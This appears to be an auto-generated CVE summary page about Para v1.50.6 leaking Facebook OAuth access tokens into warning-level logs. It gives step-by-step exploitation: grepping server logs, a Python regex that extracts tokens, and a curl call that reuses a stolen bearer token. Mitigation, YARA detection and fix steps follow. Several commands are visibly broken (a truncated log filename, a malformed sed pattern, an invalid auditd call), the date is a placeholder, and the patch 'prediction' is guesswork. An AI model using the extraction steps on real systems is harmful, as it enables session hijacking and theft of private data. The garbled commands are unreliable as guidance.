Listen to this Post
How the CVE Works
The vulnerability occurs in `FacebookAuthFilter.java` when failed authentication attempts log sensitive Facebook access tokens. The code concatenates `PROFILE_URL` with the raw `accessToken` in a warning log statement (logger.warn). Since production systems retain WARN-level logs, attackers with log access can extract valid OAuth tokens, potentially hijacking user sessions or accessing private Facebook data. The exposure stems from improper logging practices under error conditions without sanitization.
DailyCVE Form
Platform: Para
Version: v1.50.6
Vulnerability: Info Leak
Severity: Medium
Date: 2023-XX-XX
Prediction: Patch by Q3 2024
What Undercode Say:
Exploitation:
1. Log Harvesting:
grep "Facebook auth request failed" /var/log/para-server.log
2. Token Extraction:
import re
logs = open("para-server.log").read()
tokens = re.findall(r"access_token=([^&\s]+)", logs)
3. Session Hijacking:
curl -H "Authorization: Bearer STOLEN_TOKEN" https://graph.facebook.com/me
Mitigation:
1. Code Fix:
// Replace vulnerable line with:
logger.warn("Facebook auth failed: Profile fetch error", e);
2. Log Sanitization:
sed -i 's/access_token=[^&]/access_token=REDACTED/g' /var/log/para-server.
3. Facebook Token Revocation:
curl -X DELETE "https://graph.facebook.com/v12.0/me/permissions?access_token=LEAKED_TOKEN"
Detection:
1. Audit Logs:
auditd -l | grep "para-server.token"
2. YARA Rule:
rule FB_Token_Leak {
strings: $ = "access_token="
condition: any of them
}
Permanent Fix:
- Disable debug logging in production (
log4j2.xml):<Logger name="com.erudika.para" level="error"/>
- Rotate all exposed tokens via Facebook’s API.
References:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
